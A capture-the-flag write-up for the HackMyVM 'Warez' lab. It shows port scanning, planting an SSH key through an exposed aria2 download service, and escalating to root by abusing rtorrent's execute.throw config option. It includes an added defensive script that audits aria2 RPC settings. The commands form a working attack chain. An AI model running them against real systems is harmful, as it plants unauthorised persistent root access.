NOTES ABOUT Warez

[ 2022-10-09 ] [ HackMyVM / Warez ]

Status: Rooted
Skills: Port Scanning, openssl, aria2 WebUI
Tools: nmap, ssh, rtorrent, OpenSSL

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.23

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 cc:00:63:dd:49:fb:1c:c7:ac:69:63:bc:05:1a:59:cd (RSA)
| 256 9b:19:49:25:eb:9c:60:c5:2b:ec:2a:d4:fd:d1:c2:f4 (ECDSA)
|_ 256 41:16:e6:d0:a0:da:22:4f:07:3f:c8:cf:60:2c:02:79 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Aria2 WebUI
|_http-server-header: nginx/1.18.0
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.

GETTING IN

$ cp ./id_rsa.pub authorized_keys

$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.0.2.23 - - [09/Oct/2022 22:16:09] "GET /authorized_keys HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

# DOWNLOAD authorized_keys VIA ARIA2 WEBUI TO /home/carolina/.ssh

$ ssh -i id_rsa carolina@10.0.2.23
carolina@warez:~$ cat user.txt
***********
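
Added example (not part of the original notes): the foothold above relied on the aria2 JSON-RPC service on port 6800 being reachable from the network. This defender-side audit checks an aria2.conf for that exposure. The function names and both sample configs are constructed, and the absence of an rpc-secret on this box is an assumption.

```shell
#!/bin/sh
# Added example (not from the original notes): audit an aria2.conf for the
# RPC exposure this box relied on. Sample configs below are constructed.

# aria2_opt FILE KEY -> value of KEY (last occurrence), empty if unset/commented.
aria2_opt() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*\(.*[^[:space:]]\)[[:space:]]*\$/\1/p" "$1" | tail -n 1
}

# audit_aria2_conf FILE -> one finding per line; no output means no finding.
audit_aria2_conf() {
    [ "$(aria2_opt "$1" enable-rpc)" = "true" ] || return 0   # RPC disabled
    if [ "$(aria2_opt "$1" rpc-listen-all)" = "true" ]; then
        echo "rpc-listen-all=true: JSON-RPC accepts connections on every interface"
    fi
    if [ -z "$(aria2_opt "$1" rpc-secret)" ]; then
        echo "rpc-secret unset: any client that reaches the port can queue downloads"
    fi
    if [ "$(aria2_opt "$1" rpc-allow-origin-all)" = "true" ]; then
        echo "rpc-allow-origin-all=true: any web origin may call the RPC from a browser"
    fi
    return 0
}

# write_samples DIR -> creates DIR/weak.conf and DIR/hardened.conf (constructed).
write_samples() {
    cat > "$1/weak.conf" <<'EOF'
enable-rpc=true
rpc-listen-all=true
rpc-allow-origin-all=true
dir=/downloads
EOF
    cat > "$1/hardened.conf" <<'EOF'
enable-rpc=true
rpc-listen-all=false
# placeholder value; generate a long random token per host
rpc-secret=REPLACE_WITH_RANDOM_TOKEN
dir=/srv/aria2/downloads
EOF
}

tmp=$(mktemp -d)
write_samples "$tmp"
for f in weak hardened; do
    echo "== $f.conf"
    audit_aria2_conf "$tmp/$f.conf"
done
rm -rf "$tmp"
```

Because an RPC client can set the download directory per request, the config audit is only half the fix: run aria2 under a dedicated account that has no write access to any user's home directory.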

ELEVATING PRIVILEGES

carolina@warez:~$ echo "execute.throw = mkdir, /root/.ssh" > .rtorrent.rc
carolina@warez:~$ rtorrent
carolina@warez:~$ echo "execute.throw = cp, /home/carolina/.ssh/authorized_keys, /root/.ssh/authorized_keys" > .rtorrent.rc
carolina@warez:~$ rtorrent

$ ssh -i ./id_rsa root@10.0.2.23
Linux warez 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 31 02:34:57 2021
root@warez:~# cat root.txt
*************

root@warez:~# init 0
